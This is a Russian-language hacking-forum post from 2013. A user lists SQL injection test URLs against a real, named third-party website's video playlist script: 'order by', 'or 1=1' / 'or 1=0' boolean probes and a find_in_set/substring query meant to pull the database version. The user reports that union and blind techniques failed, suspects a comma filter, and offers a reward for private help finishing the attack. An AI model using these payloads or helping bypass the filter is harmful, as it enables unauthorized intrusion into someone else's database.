Показать сообщение отдельно

  #7  
Старый 25.12.2013, 19:14
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

Быть может, у кого появятся какие идеи как реализовать.

Валидное условие:

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+order+by+1--+

Валидное условие:

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=1--+

Невалидное условие:

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=0--+

Неполучилось провести объединение через union, ни через blind конструкции.

условие

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' or 5=find_in_set(substring((SELECT version()),1,1),'1,1,2,3,4,5')--+ не срабатывает, не срабатывает даже substring в чистом варианте виде +or+5=substring(version(),1,1)--+

Если не трудно, то в личку если есть конкретные варианты. С меня бонус

P.S. Походу где-то рубиться запятая не давая использовать функции соотв
 
Ответить с цитированием